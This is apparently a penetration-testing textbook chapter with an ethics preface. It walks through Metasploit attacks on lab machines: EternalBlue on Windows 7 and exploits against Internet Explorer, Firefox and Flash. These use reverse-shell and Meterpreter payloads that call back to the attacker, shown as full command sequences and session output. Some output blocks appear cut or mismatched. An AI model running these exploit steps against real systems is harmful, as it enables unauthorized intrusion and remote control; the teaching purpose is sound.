How does an adversary attack a computer system? One approach is to provide data to a program running on that system that causes it to act on behalf of the attacker. The Morris worm, released in 1988, attacked vulnerable services including fingerd and sendmail, as well as poorly configured rexec and rsh. When it attacked fingerd, it sent a 536-byte request to C code using gets() that provided a buffer with only 512 bytes of space; the resulting overflow allowed the worm’s code to execute on the target.
On systems running between 2011 and 2017, most services that listen for unsolicited network connections have been hardened sufficiently that remote attacks rarely succeed. One major exception has been the EternalBlue exploit and related attacks. In general, the attackers’ focus has moved to programs run by users on these systems that take untrusted input. The most common such tool is the web browser.
In this chapter, the reader will learn how to use Metasploit to launch the EternalBlue attack and to attack web browsers and web browser plugins across a range of Windows and Linux systems. The reader will also learn how to use Metasploit to generate malware and to use it to exploit systems.
Ethics
Let me begin this chapter with a personal note about ethics.
As anyone who has done it knows, hacking is fun. It is often exciting, exhilarating, and intoxicating, but it can and does blind people to the consequences of their actions. When practicing or using offensive skills, consider - is this something you would share publicly? Would you be willing to put this on your resume? Or tell the important people in your life? Do you have explicit permission to do what you are doing? Was permission granted by someone authorized to give it?
Don’t rationalize behavior, especially after the fact. Saying that you are doing something to improve security holds no water. Imagine you came home to find someone had broken into your apartment, and their response is to tell you that they were just testing your security and by the way that you should really use better locks on your windows.
Law enforcement has gotten much better at tracking attackers that get their attention, and the size of the punishments they try to impose have become surprisingly large. Robert Morris, the author of the Morris worm, which is estimated to have infected a significant fraction of the Internet in 1988, was the first person convicted under the Federal Computer Fraud and Abuse Act, and he received three years’ probation, fined $10,000, and ordered to perform 400 hours of community service.1 Compare that with the story of Aaron Swartz who in 2010 and 2011 downloaded copies of many academic journals. He was caught and charged with fraud and violating the Federal Computer Fraud and Abuse Act, which could have resulted in 35 years in prison and a million-dollar fine;2 instead, he committed suicide.3
Metasploit
Metasploit is a popular penetration testing tool that comes preinstalled on Kali systems. It is composed of separate tools, including msfconsole, the core interactive text program that allows a user to interact with the different Metasploit components; and msfvenom, which is used to generate payloads and stand-alone malware.
There are graphical user interfaces available for Metasploit; one popular tool available on Kali is Armitage.
Metasploit is a modular tool and separates the exploit, which attacks the vulnerable target, from the payload, which is what is run on the target after a successful exploit. Metasploit also provides separate auxiliary modules, many of which are used for network discovery; and post-exploitation modules, which are run on targets after a successful exploit, often to escalate privileges on the target.
Vulnerabilities
Metasploit exploit modules generally target a single vulnerability on the target. A vulnerability in software is a flaw that can potentially be used by an unauthorized user to cross a security boundary. To provide a uniform method to refer to vulnerabilities, the dictionary of Common Vulnerabilities and Exposures (CVE) was created.
Not all vulnerabilities are sufficiently serious to warrant a CVE number. Referencing a vulnerability by its CVE number helps different researchers be sure that they are talking about the same underlying issue. CVE numbers have the form CVE-YYYY-ZZZZ where YYYY is the year and ZZZZ is an identifier within that year, like CVE 2008-4250. Prior to 2014, identifiers were four digits; now identifiers may be arbitrarily long. The full CVE list is available at https://cve.mitre.org.
Security problems in Microsoft products are also commonly identified by the Microsoft Security Bulletin that addresses the issue. These are labeled in the form MSYY-ZZZ where YY is a two-digit year and ZZZ is an identifier within that year, like MS08-067.
Metasploit: EternalBlue
In April 2017, a group calling themselves the Shadow Brokers released a collection of exploit tools that they claimed had been used by the NSA. One of the tools was named EternalBlue and exploited a vulnerability in Windows SMB. The underlying vulnerability was patched by Microsoft in MS17-010, while the vulnerabilities themselves are numbered CVE 2017-0143, CVE 2017-0144, CVE 2017-0145, CVE 2017-0146, CVE 2017-0147, and CVE 2017-0148.
Attack: EternalBlue on Windows 7 SP1
The Metasploit module that exploits this vulnerability is exploit/windows/smb/ms17_010_eternalblue. This Metasploit module affects only 64-bit systems running Windows 7 or Windows Server 2008 R2. The target system must be configured so that TCP/445 is accessible to the attacker. The related module exploit/windows/smb/ms17_010_eternalblue_win8 affects Windows 8, 8.1, and 10.
Configuring the Metasploit Internal Database
Metasploit uses a PostgreSQL database to store its data, which is not started by default on Kali. Though Metasploit can function without its database, it is preferential to have it available. Start the database and ensure that the database starts automatically on subsequent boots with the following commands.
root@Kali201602:~# systemctl start postgresql
root@Kali201602:~# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
These steps only need to be performed once on a Kali system; afterwards the database will be functioning correctly.4
Launching Metasploit
Start the Metasploit tool msfconsole from the command line by running
root@Kali201602:~# msfconsole -q
msf >
Here the -q switch is used with msfconsole to suppress the amusing but large startup banner. Be patient; it can take a moment or two before the msf > prompt is ready. Once Metasploit is running, verify that the database is running by running the command
msf > db_status
[*] postgresql connected to msf
Selecting the Exploit
From Metasploit, select the EternalBlue exploit with the use command.
msf > useexploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >
Notice that the command prompt has changed; now it includes the exploit module as part of the prompt.
The info command provides the user with information about the chosen exploit.
msf exploit(ms17_010_eternalblue) > info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to
groom the kernel pool.
GroomDelta 5 yes The amount to increase the
groom count by per try.
MaxExploitAttempts 3 yes The number of times to
retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload
into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows
domain to use for
authentication
SMBPass no (Optional) The password
for the specified
username
SMBUser no (Optional) The username to
authenticate as
VerifyArch true yes Check if remote
architecture matches
exploit Target.
VerifyTarget true yes Check if remote OS matches
exploit Target.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser,SMBPass, and SMBDomain options it will use those instead. On
some systems, this module may cause system instability and crashes,
such as a BSOD or a reboot. This may be more likely with some
payloads.
... Output Deleted ...
Setting Options
Before the exploit can be run, the required options need to have values chosen. For this exploit module, the only required option that is initially unset is RHOST; this is the IP address or hostname of the target. Suppose that 10.0.15.210 is the IP address of a 64-bit Windows 7 (SP 1) system that has TCP/445 accessible to the attacker. To target this system, the attacker configures the option in the module with the set command.
msf exploit(ms17_010_eternalblue) > set rhost 10.0.15.210
rhost => 10.0.15.210
Choosing the Payload
Before the attack is launched, the attacker needs to determine what to do if the attack is successful. This is done by selecting a payload. A payload can be code that is run on the remote system, or it can be as simple as a single command. The available payloads for an exploit can be seen with the command show payloads.
msf exploit(ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
Inline
windows/x64/exec normal Windows x64 Execute Command
windows/x64/loadlibrary normal Windows x64 LoadLibrary Path
...Output Deleted ...
windows/x64/meterpreter normal Windows Meterpreter
/reverse_http (Reflective Injection x64), Windows
x64 Reverse HTTP Stager (wininet)
windows/x64/meterpreter normal Windows Meterpreter (Reflective
/reverse_https Injection x64), Windows x64 Reverse
HTTP Stager (wininet)
windows/x64/meterpreter normal Windows Meterpreter (Reflective
/reverse_tcp Injection x64), Windows x64 Reverse
TCP Stager
... Output Deleted ...
The most commonly used payload is Meterpreter. Meterpreter is a program designed to be run on the target and provides the attacker with a collection of features that allow them to control their target. Meterpreter can be run in many ways; in some, the target system opens a port and waits for the attacker to connect to that port. Because this approach is easily stopped by firewalls, the usual approach is a reverse shell. In this case, the target system calls back to the attacking system; this can be done over HTTP, HTTPS, or over a custom TCP port.
In this example, the attacker elects to use Meterpreter calling back over TCP.
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
Once the payload is selected, additional options may need to be configured. The command options lists the currently selected options for the exploit.
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
In this case, the required option, LHOST, still needs to be set. This is the address of the system that the attacker will call back to. The simplest value here is the IP address of the Kali system that is being used to launch the attack. In this case, when the attack is launched, Metasploit will automatically configure a listener to handle the callback from the target.
msf exploit(ms17_010_eternalblue) > set lhost 10.0.2.2
lhost => 10.0.2.2
Note that the variable names in Metasploit are not case sensitive.
Launching the Exploit
With the required options selected, the exploit can be launched with the command exploit or the command run.
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.0.2.2:4444
[*] 10.0.15.210:445 - Connecting to target for exploitation.
[+] 10.0.15.210:445 - Connection established for exploitation.
[+] 10.0.15.210:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.15.210:445 - CORE raw buffer dump (42 bytes)
If the exploit reports that the connection timed out, this is often caused by a firewall on the target. For the purposes of testing the exploit, consider disabling the firewall on the Windows target.
Interacting with Meterpreter
The change in the command prompt shows that the attacker is now interacting with Meterpreter running on the remote system. The attacker can then issue commands and have them run on the remote system. To determine basic information about the system, the Meterpreter command sysinfo can be used.
meterpreter > sysinfo
Computer : EDGEWORTH
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : PLUTO
Logged On Users : 2
Meterpreter : x64/windows
To determine the user ID that is being used to run Meterpreter, the command getuid can be used.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This exploit escalates privileges to SYSTEM on the target, but this is quite unusual; most exploits simply provide access to the target and other exploits or techniques are needed before gaining SYSTEM.
The attacker can interact with a traditional command prompt on the remote target by issuing the shell command.
meterpreter > shell
Process 1816 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
To exit the shell and return to Meterpreter, press CTRL+Z.
C:\Windows\system32>^Z
Background channel 1? [y/N] y
Metasploit Sessions
When the attacker is done interacting with this target, they can use the background command.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) >
The attacker is now interacting with Metasploit rather than with the instance of Meterpreter that has been deployed on the target at 10.0.15.210.
Metasploit can manage multiple sessions. To see the currently running sessions, the attacker can use the sessions command. The command help sessions shows some of the options to the sessions command.
-C <opt> Run a Meterpreter Command on the session given with -i, or
all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
If the attacker wishes to continue interacting with the session established with 10.0.15.210, they can return to the Meterpreter command prompt with
msf exploit(ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Exiting Metasploit
If the attacker has finished their work with Metasploit entirely, then from the Metasploit command prompt they can issue the command exit. If Metasploit currently has established sessions with remote systems, the attacker needs to confirm the request to exit.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(ms17_010_eternalblue) > exit -y
root@kali-2016-2-u:~#
Metasploit: Attacking the Browser
Another way an attacker can obtain a shell on a remote system is by attacking the browser. To do so, the attacker uses Metasploit to create a URL that hosts malicious code. The exploit code targets a particular vulnerability, is (usually) specific to the browser and its patch level, and is configured to provide a payload that the target executes. Once the victim browses to that URL, the exploit runs. If the exploit is successful, the payload will execute and usually provide a way for the attacker to interact with the target system.
Metasploit Modules for Internet Explorer
There are many exploits that can be used to attack particular versions of Internet Explorer and a few that affect Firefox. In contrast, there are currently none available that target Chrome.
The following Metasploit modules can be used to attack Internet Explorer directly. Each listed exploit begins with a descriptive exploit title. Next is the name that is used to refer to the exploit from within Metasploit. For Internet Explorer vulnerabilities, these usually take the form exploit/windows/browser/<name>. Next is the CVE number for the vulnerability that is being exploited and then the identifier for the Microsoft Security Bulletin that addresses the vulnerability. This is followed by the version or versions of Windows and Internet Explorer that the exploit can successfully attack. In some cases, additional software is required to be present on the target for the exploit to function; if this is the case, it is noted.
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
exploit/windows/browser/ms11_003_ie_css_import
CVE 2010-3971, MS11-003
Internet Explorer 8 on Windows 7 (including SP 1)
Requires .NET 2.0.50727 installed on the target. This is included by default on Windows 7 SP1.
MS11-081 Microsoft Internet Explorer Option Element Use-After-Free
exploit/windows/browser/ms11_081_option
CVE 2011-1996, MS11-081
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
exploit/windows/browser/ms12_037_ie_colspan
CVE 2010-1876, MS12-037
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability
exploit/windows/browser/ie_cbutton_uaf
CVE 2012-4792, MS13-008
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
exploit/windows/browser/ie_execcommand_uaf
CVE 2012-4969, MS12-063
Internet Explorer 8, 9 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
exploit/windows/browser/ie_cgenericelement_uaf
CVE 2013-1347, MS13-038
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow
exploit/windows/browser/ms13_037_svg_dashstyle
CVE 2013-2551, MS13-037
Internet Explorer 8 on Windows 7 (SP1 only; x86)
MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
exploit/windows/browser/ms13_055_canchor
CVE 2013-3163, MS13-055
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
exploit/windows/browser/ms13_080_cdisplaypointer
CVE 2013-3897, MS13-080
Internet Explorer 8 on Windows 7 (including SP1)
Requires Java 6 on the target
MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free
exploit/windows/browser/ms14_012_cmarkup_uaf
CVE 2014-0322, MS14-012
Internet Explorer 10 on Windows 7 (including SP1)
Requires Flash Player 12 on the target
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution
Internet Explorer 8-11 on Windows 7 (including SP1)
Attack: MS13-055 CAnchorElement
To demonstrate the use of Metasploit to attack a browser, suppose an attacker targets Internet Explorer 8 on a Windows 7 Service Pack 1 system with the MS13-055 CAnchorElement attack. This is representative of the process needed for the other exploits.
Starting the Exploit
Start a Windows 7 Service Pack 1 virtual machine with Java 6 installed as the target. From Metasploit on the attacker’s Kali system, select the exploit; choose the MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free attack by selecting the corresponding exploit module with the use command.
msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > info
Name: MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free
Module: exploit/windows/browser/ms13_055_canchor
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-07-09
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Automatic
1 IE 8 on Windows XP SP3
2 IE 8 on Windows 7
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
Payload information:
Avoid: 1 characters
Description:
In IE8 standards mode, it's possible to cause a use-after-free
condition by first creating an illogical table tree, where a
CPhraseElement comes after CTableRow, with the final node being a
sub table element. When the CPhraseElement's outer content is reset
by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a
CAnchorElement, but some other objects apply too), but a reference
is still kept in function SRunPointer::SpanQualifier. This function
will then pass on the invalid reference to the next functions,
eventually used in mshtml!CElement::Doc when it's trying to make a
call to the object's SecurityContext virtual function at offset
+0x70, which results a crash. An attacker can take advantage of this
by first creating an CAnchorElement object, let it free, and then
replace the freed memory with another fake object. Successfully
doing so may allow arbitrary code execution under the context of the
user. This bug is specific to Internet Explorer 8 only. It was
originally discovered by Jose Antonio Vazquez Gonzalez and reported
to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.
... Output Deleted ...
Configuring the Exploit
Many Metasploit modules provide automatic targeting, including this exploit. In this case, the target is known to be a Windows 7 system, so set the target appropriately using the set command.
msf exploit(ms13_055_canchor) > set target 2
target => 2
Most basic options are well explained by the info command; for example, the SRVHOST and SRVPORT variables provide the IP address and port number that will be used to host the exploit. The variable URIPATH is the URI for the exploit; if this is not changed, then a random URI will be generated. Fix the URI to an innocuous value, say “bob”; after all, Bob is a builder, not a hacker.
msf exploit(ms13_055_canchor) > set uripath bob
uripath => bob
Choosing the Payload
At this point, the exploit is configured, but the payload is not. Once an exploit and a target have been selected, the list of available payloads can be enumerated by the command
msf exploit(ms13_055_canchor) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
... Output Deleted ...
There are more than 150 possible payloads that are compatible with this exploit. These payloads can be roughly classified by the payload’s action and communication method. Major actions include the following:
running Meterpreter on the target,
running a command shell on the target,
running VNC on the target,
running a single command on the target, and
uploading and executing a file or injecting a DLL.
Major communication methods include these:
reverse connections, where the target calls back to the attacker, and
forward connections, where the attacker calls out to the victim.
Select the Meterpreter payload that connects back to the attacker via reverse HTTPS with the command
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_https
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 IE 8 on Windows 7
The only required option unset is the IP address of the Metasploit system that will catch the callback from the victim. The simplest approach is to use the same system that is hosting the exploit, though this is not required. To camouflage the connection and make it look more like real HTTPS traffic, set the payload’s listening port to 443.
msf exploit(ms13_055_canchor) > set lhost 172.16.30.3
lhost => 172.16.30.3
msf exploit(ms13_055_canchor) > set lport 443
lport => 443
Launching the Exploit as a Background Job
The exploit is now ready to launch. To launch the exploit and have it run in the background as a job, run
msf exploit(ms13_055_canchor) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://172.16.30.3:443
msf exploit(ms13_055_canchor) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://172.16.30.3:8080/bob
[*] Server started.
Because the exploit was run as a background job, the command prompt reappeared while the exploit was still writing to the screen; this is common.
Interacting with the Shell
Return to the Windows target and use Internet Explorer to browse to the URL specified in the exploit. In the example, the server is running at 172.16.30.3, on port 8080, with URI bob, so visit the page http://172.16.30.3:8080/bob. On the Windows system, the browser will simply hang and crash; Task Manager (CTRL+ALT+DEL) may be needed to stop it.
On the Kali system, Metasploit reports the connection and notifies the attacker that a session has been created.
To interact with the session from this target, use sessions -i.
msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SOHO
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: SOHO\David Hilbert
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms13_055_canchor) >
Metasploit Modules for Firefox
There are many reliable exploit modules that can be used against Firefox. Most are cross-platform and can successfully be used against both Windows and Linux targets.
Metasploit also has a module that can be used in social engineering attacks. It provides the user with a malicious add-on for Firefox. If the user runs the presented .xpi file, a shell is presented to the attacker.
Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
Firefox is attacked using the same techniques that are used against Internet Explorer. The attacker uses Metasploit to set up a web server hosting the exploit code and waits until the user of a vulnerable system browses to the web server. The exploit launches, and the payload is executed on the victim’s system. If the payload is interactive, then the attacker can continue to interact with the victim’s system.
To demonstrate the process, start an OpenSuSE 13.2 system; it includes Firefox 33.0 by default, and so it is vulnerable to the Firefox Proxy Prototype Privileged Javascript Injection attack.
Configuring the Exploit
On Kali, start the PostgreSQL server if it has not been started, then run msfconsole from the command line. Select the exploit
msf > use exploit/multi/browser/firefox_proxy_prototype
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
Payload information:
Description:
This exploit gains remote code execution on Firefox 31-34 by abusing
a bug in the XPConnect component and gaining a reference to the
privileged chrome:// window. This exploit requires the user to click
anywhere on the page to trigger the vulnerability.
... Output Deleted ...
This module has two classes of targets: a JavaScript target that is appropriate for most systems, and a native payload that needs to match the architecture of the connecting system. Select the default JavaScript target, and configure the URIPATH.
msf exploit(firefox_proxy_prototype) > set target 0
target => 0
msf exploit(firefox_proxy_prototype) > set uripath bob
uripath => bob
Configuring the Payload
The JavaScript XPCOM Shell only allows a few possible payloads.
msf exploit(firefox_proxy_prototype) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
firefox/exec normal Firefox XPCOM Execute Command
firefox/shell_bind_tcp normal Command Shell, Bind TCP (via Firefox
XPCOM script)
firefox/shell_reverse_tcp normal Command Shell, Reverse TCP (via
Firefox XPCOM script)
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
Inline
Select the Firefox shell using reverse TCP. The listening host must be set, though the listening port (TCP/4444) can be left in its default state.
msf exploit(firefox_proxy_prototype) > set payload firefox/shell_reverse_tcp
payload => firefox/shell_reverse_tcp
msf exploit(firefox_proxy_prototype) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(firefox_proxy_prototype) > show options
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH bob no The URI to use for this exploit
(default is random)
Payload options (firefox/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal (Javascript XPCOM Shell)
Launching the Exploit as a Background Job
Start the exploit as a job by running
msf exploit(firefox_proxy_prototype) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.2:4444
[*] Using URL: http://0.0.0.0:8080/bob
msf exploit(firefox_proxy_prototype) >
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Interacting with the Shell
On the OpenSuSE 13.2 system, use Firefox to navigate to the malicious content, hosted in this example at http://10.0.2.2:8080/bob. The user is presented with a page saying that the page has moved and to click to redirect. As soon as the user clicks in the browser, the attacker is notified that a session has been established.
[*] 10.0.2.93 firefox_proxy_prototype - Gathering target information for 10.0.2.93
[*] 10.0.2.93 firefox_proxy_prototype - Sending HTML response to 10.0.2.93
[*] Command shell session 1 opened (10.0.2.2:4444 -> 10.0.2.93:51118) at 2017-02-19 12:52:44 -0500
It may appear that nothing has occurred; this is not the case. Instead, shell commands can be run as if the attacker had a shell on the system but without a prompt.
The session can be moved to the background by pressing CTRL+Z.
^Z
Background session 1? [y/N] y
msf exploit(firefox_proto_crmfrequest) >
Metasploit: Attacking Flash
It is possible to attack a component of the browser, rather than the browser itself. One common browser plugin is Adobe Flash Player, and there are reliable Metasploit modules that attack the Flash plugin on Windows systems. Beginning with Windows 8, Microsoft includes a version of Adobe Flash Player in the default installation configured for Internet Explorer and Edge. Windows 8 includes Adobe Flash Player 11.3.372, Windows 8.1 includes 11.8.800, the initial Windows 10 release (version 1504, build 10240) includes Adobe Flash Player 18.0.0, while the anniversary edition (version 1607, build 14393) includes Adobe Flash Player 22.0.0, and the Fall Creator’s update (version 1709) includes Adobe Flash Player 27.0.0.
Metasploit Modules for Adobe Flash Player
The following are reliable attacks against Adobe Flash Player. This list includes the description of the attack, the Metasploit name, and the CVE number of the corresponding vulnerability as well as the browser(s) and operating system(s) that can be affected. Many exploits affect a wide range of Flash Player versions; this list includes some of the commonly exploitable versions but is not exhaustive. If the exploit requires additional software to be present on the target, it is also noted.
Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
Adobe Flash Player Regular Expression Heap Overflow
exploit/windows/browser/adobe_flash_regex_value
CVE 2013-0643
Internet Explorer 8 on Windows 7 (including SP1)
Flash Player 11.5, up to 11.5.502.146
Requires Java on the Target
Adobe Flash Player Integer Underflow Remote Code Execution
exploit/windows/browser/adobe_flash_avm2
CVE 2014-0497
Internet Explorer 8, 9, or 10 on Windows 7 (including SP1) or Windows 8
Flash Player 11.3 up to 11.3.372.94, Flash Player 11.7 up to 11.7.700.202 and other versions. The default Windows 8 included version of Flash is vulnerable.
Windows 7 (including SP1) or Windows 8.1 (not Windows 8), 32-bit
Internet Explorer or Firefox
Adobe Flash Player 18 up to 18.0.0.203
Attack: Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
As an example of an Adobe Flash Player exploit, consider Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory. For the target, use a 32-bit Windows 8.1 system with Firefox 38.0.5 and Adobe Flash Player 15.0.0.189.
Configuring the Exploit
On the Kali system, start Metasploit and load the exploit.
msf > use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > info
Name: Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must
be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
URIPATH no The URI to use for this exploit
(default is random)
Payload information:
Description:
This module exploits an unintialized memory vulnerability in Adobe
Flash Player. The vulnerability occurs in the
ByteArray::UncompressViaZlibVariant method, which fails to
initialize allocated memory. When using a correct memory layout this
vulnerability leads to a ByteArray object corruption, which can be
abused to access and corrupt memory. This module has been tested
successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash
15.0.0.189.
Like most Adobe Flash exploits, this exploit uses automatic targeting, so there is no need to change the target from the default. Set the URIPATH to something innocuous, say bob.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set uripath bob
uripath => bob
Configuring the Payload
A reasonable payload is Meterpreter using a reverse TCP connection.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
The only option that needs to be configured on the payload is the IP address; by default, the exploit uses TCP/4444 for the listening port.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > show options
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > [*] Started reverse TCP handler on 10.0.2.2:4444
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Interacting with the Shell
When Firefox 38.0.5 in Windows 8.1 is used to browse to the URL hosting the malicious code (in this example http://10.0.2.2:8080/bob), the attacker is presented with a session.
[*] Server started.
[*] 10.0.15.207 adobe_flash_uncompress_zlib_uninitialized - Gathering target information for 10.0.15.207
[*] 10.0.15.207 adobe_flash_uncompress_zlib_uninitialized - Sending HTML response to 10.0.15.207
Many older exploits for Internet Explorer, Firefox, and Flash require the presence of Java on the target system. The primary reason for this is the need for a ROP chain. Since many modern computers prevent the attacker from executing code that the attacker has placed on the stack, attackers turned to the idea of using already present pieces of code loaded at known addresses. By carefully jumping from one piece of existing code to another, attackers can control program execution and so exploit the system. One common program with libraries loaded at known locations is Java 6, which is why it is required for some of the older exploits.
Java is a legitimate target on its own and can be attacked directly. One nice feature about Java attacks is that thanks to the JVM, most (though not all) are agnostic about the underlying platform. They (usually) work against both Windows and Linux targets and are independent of the underlying browser.
Metasploit Modules for Java
Effective Metasploit modules for Java include the following:
Attacks on Java follow the same structure seen for attacks on browsers and Adobe Flash Player. This example attacks a Mint 13 system running Firefox 12.0 with Java 7 Update 5 with the Java Applet JAX-WS Remote Code Execution attack.
Configuring the Exploit
Start both Mint 13 and Kali; on the Kali system, start msfconsole, select the appropriate attack, and use info to see the module details.
msf > use exploit/multi/browser/java_jre17_jaxws
